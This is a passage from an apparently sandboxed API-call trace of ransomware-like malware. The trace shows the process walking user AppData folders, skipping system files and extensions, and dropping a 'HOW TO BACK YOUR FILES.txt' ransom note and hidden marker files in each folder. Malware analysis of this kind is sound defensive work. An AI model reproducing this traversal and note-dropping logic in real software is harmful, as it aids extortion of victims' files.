[0058.977] lstrcmpiW (lpString1="tory", lpString2=".dll") returned 1 [0058.977] lstrlenW (lpString=".lnk") returned 4 [0058.977] lstrcmpiW (lpString1="tory", lpString2=".lnk") returned 1 [0058.977] lstrlenW (lpString=".ini") returned 4 [0058.977] lstrcmpiW (lpString1="tory", lpString2=".ini") returned 1 [0058.977] lstrlenW (lpString=".sys") returned 4 [0058.977] lstrcmpiW (lpString1="tory", lpString2=".sys") returned 1 [0058.977] FindNextFileW (in: hFindFile=0xc73048, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe52e83dd, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe52e83dd, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe52f2009, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NativeCache.directory", cAlternateFileName="NATIVE~1.DIR")) returned 0 [0058.977] FindClose (in: hFindFile=0xc73048 | out: hFindFile=0xc73048) returned 1 [0058.978] lstrcpyW (in: lpString1=0x30aeb26, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0058.978] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\flash player\\nativecache\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c4 [0058.979] CreateFileMappingW (hFile=0x2c4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2b8 [0058.979] MapViewOfFile (hFileMappingObject=0x2b8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0058.980] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0058.980] CloseHandle (hObject=0x2b8) returned 1 [0058.980] CloseHandle (hObject=0x2c4) returned 1 [0058.980] GetCurrentThreadId () returned 0xfa8 [0058.980] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66528 [0058.980] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache" [0058.980] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71840 | out: hHeap=0xc50000) returned 1 [0058.980] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66520 | out: hHeap=0xc50000) returned 1 [0058.980] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache" [0058.980] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\" [0058.980] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\.BFC0E91B00AE8A0620D3" [0058.980] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\flash player\\assetcache\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c4 [0058.982] WriteFile (in: hFile=0x2c4, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0059.007] FlushFileBuffers (hFile=0x2c4) returned 1 [0059.009] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0059.009] CloseHandle (hObject=0x2c4) returned 1 [0059.010] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache") returned 61 [0059.010] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.010] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe5380e4e, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe538be0f, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x882c9af2, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc73248 [0059.010] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.011] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0059.011] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0059.011] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0059.011] FindNextFileW (in: hFindFile=0xc73248, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe5380e4e, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe538be0f, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x882c9af2, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.011] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.011] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0059.011] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0059.011] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0059.011] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0059.011] FindNextFileW (in: hFindFile=0xc73248, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x882c9af2, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x882c9af2, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x88316022, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0059.011] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.011] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0059.011] FindNextFileW (in: hFindFile=0xc73248, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe538be0f, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe538be0f, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe538be0f, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="G7ZD37Y5", cAlternateFileName="")) returned 1 [0059.011] lstrcmpiW (lpString1="G7ZD37Y5", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.011] lstrcmpiW (lpString1="G7ZD37Y5", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.011] lstrcmpiW (lpString1="G7ZD37Y5", lpString2="Tiger4444.exe") returned -1 [0059.011] lstrcmpiW (lpString1="G7ZD37Y5", lpString2=".") returned 1 [0059.011] lstrcmpiW (lpString1="G7ZD37Y5", lpString2="..") returned 1 [0059.011] lstrcmpiW (lpString1="G7ZD37Y5", lpString2="windows") returned -1 [0059.011] lstrcmpiW (lpString1="G7ZD37Y5", lpString2="bootmgr") returned 1 [0059.011] lstrcmpiW (lpString1="G7ZD37Y5", lpString2="pagefile.sys") returned -1 [0059.011] lstrcmpiW (lpString1="G7ZD37Y5", lpString2="boot") returned 1 [0059.011] lstrcmpiW (lpString1="G7ZD37Y5", lpString2="ids.txt") returned -1 [0059.011] lstrcmpiW (lpString1="G7ZD37Y5", lpString2="NTUSER.DAT") returned -1 [0059.011] lstrcpyW (in: lpString1=0x30aeb24, lpString2="G7ZD37Y5" | out: lpString1="G7ZD37Y5") returned="G7ZD37Y5" [0059.011] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc664e0 [0059.011] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8e) returned 0xc85900 [0059.011] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc664e8 | out: ListHead=0xc66828, ListEntry=0xc664e8) returned 0xc664c8 [0059.011] FindNextFileW (in: hFindFile=0xc73248, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe538be0f, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe538be0f, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe538be0f, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="G7ZD37Y5", cAlternateFileName="")) returned 0 [0059.012] FindClose (in: hFindFile=0xc73248 | out: hFindFile=0xc73248) returned 1 [0059.012] lstrcpyW (in: lpString1=0x30aeb24, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0059.012] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\flash player\\assetcache\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c4 [0059.014] CreateFileMappingW (hFile=0x2c4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2b8 [0059.014] MapViewOfFile (hFileMappingObject=0x2b8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0059.014] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0059.014] CloseHandle (hObject=0x2b8) returned 1 [0059.014] CloseHandle (hObject=0x2c4) returned 1 [0059.015] GetCurrentThreadId () returned 0xfa8 [0059.015] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc664e8 [0059.015] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\G7ZD37Y5", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\G7ZD37Y5") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\G7ZD37Y5" [0059.015] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc85900 | out: hHeap=0xc50000) returned 1 [0059.015] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc664e0 | out: hHeap=0xc50000) returned 1 [0059.015] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\G7ZD37Y5" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\G7ZD37Y5") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\G7ZD37Y5" [0059.015] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\G7ZD37Y5", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\G7ZD37Y5\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\G7ZD37Y5\\" [0059.015] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\G7ZD37Y5\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\G7ZD37Y5\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\G7ZD37Y5\\.BFC0E91B00AE8A0620D3" [0059.015] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\G7ZD37Y5\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\flash player\\assetcache\\g7zd37y5\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c4 [0059.016] WriteFile (in: hFile=0x2c4, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0059.336] FlushFileBuffers (hFile=0x2c4) returned 1 [0059.337] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\G7ZD37Y5\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0059.338] CloseHandle (hObject=0x2c4) returned 1 [0059.338] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\G7ZD37Y5") returned 70 [0059.338] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.338] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\G7ZD37Y5\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe538be0f, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe538be0f, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x88316022, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72fc8 [0059.339] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.339] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0059.339] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0059.339] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0059.339] FindNextFileW (in: hFindFile=0xc72fc8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe538be0f, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe538be0f, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x88316022, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.339] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.339] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0059.339] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0059.339] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0059.339] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0059.339] FindNextFileW (in: hFindFile=0xc72fc8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x88316022, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x88316022, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x886372a6, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0059.339] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.339] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0059.339] FindNextFileW (in: hFindFile=0xc72fc8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x88316022, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x88316022, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x886372a6, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0059.339] FindClose (in: hFindFile=0xc72fc8 | out: hFindFile=0xc72fc8) returned 1 [0059.339] lstrcpyW (in: lpString1=0x30aeb36, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0059.339] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\G7ZD37Y5\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\flash player\\assetcache\\g7zd37y5\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c4 [0059.340] CreateFileMappingW (hFile=0x2c4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2b8 [0059.340] MapViewOfFile (hFileMappingObject=0x2b8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0059.340] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0059.340] CloseHandle (hObject=0x2b8) returned 1 [0059.340] CloseHandle (hObject=0x2c4) returned 1 [0059.340] GetCurrentThreadId () returned 0xfa8 [0059.341] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc664c8 [0059.341] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat" [0059.341] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc5e610 | out: hHeap=0xc50000) returned 1 [0059.341] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc664c0 | out: hHeap=0xc50000) returned 1 [0059.341] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat" [0059.341] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\" [0059.341] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\.BFC0E91B00AE8A0620D3" [0059.341] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\acrobat\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c4 [0059.342] WriteFile (in: hFile=0x2c4, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0059.345] FlushFileBuffers (hFile=0x2c4) returned 1 [0059.346] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0059.346] CloseHandle (hObject=0x2c4) returned 1 [0059.347] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat") returned 45 [0059.347] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.347] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x715a3e1e, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x715a3e1e, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x886372a6, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72e08 [0059.347] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.347] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0059.347] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0059.347] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0059.347] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x715a3e1e, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x715a3e1e, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x886372a6, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.347] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.347] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0059.347] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0059.347] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0059.347] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0059.347] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x886372a6, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x886372a6, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x886372a6, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0059.347] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.347] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0059.347] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x715a3e1e, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x5bd69dbd, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0x5bd69dbd, ftLastWriteTime.dwHighDateTime=0x1d35e02, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DC", cAlternateFileName="")) returned 1 [0059.348] lstrcmpiW (lpString1="DC", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.348] lstrcmpiW (lpString1="DC", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.348] lstrcmpiW (lpString1="DC", lpString2="Tiger4444.exe") returned -1 [0059.348] lstrcmpiW (lpString1="DC", lpString2=".") returned 1 [0059.348] lstrcmpiW (lpString1="DC", lpString2="..") returned 1 [0059.348] lstrcmpiW (lpString1="DC", lpString2="windows") returned -1 [0059.348] lstrcmpiW (lpString1="DC", lpString2="bootmgr") returned 1 [0059.348] lstrcmpiW (lpString1="DC", lpString2="pagefile.sys") returned -1 [0059.348] lstrcmpiW (lpString1="DC", lpString2="boot") returned 1 [0059.348] lstrcmpiW (lpString1="DC", lpString2="ids.txt") returned -1 [0059.348] lstrcmpiW (lpString1="DC", lpString2="NTUSER.DAT") returned -1 [0059.348] lstrcpyW (in: lpString1=0x30aeb04, lpString2="DC" | out: lpString1="DC") returned="DC" [0059.348] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc666c0 [0059.348] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x62) returned 0xc8f8c0 [0059.348] RtlInterlockedPushEntrySList (in: 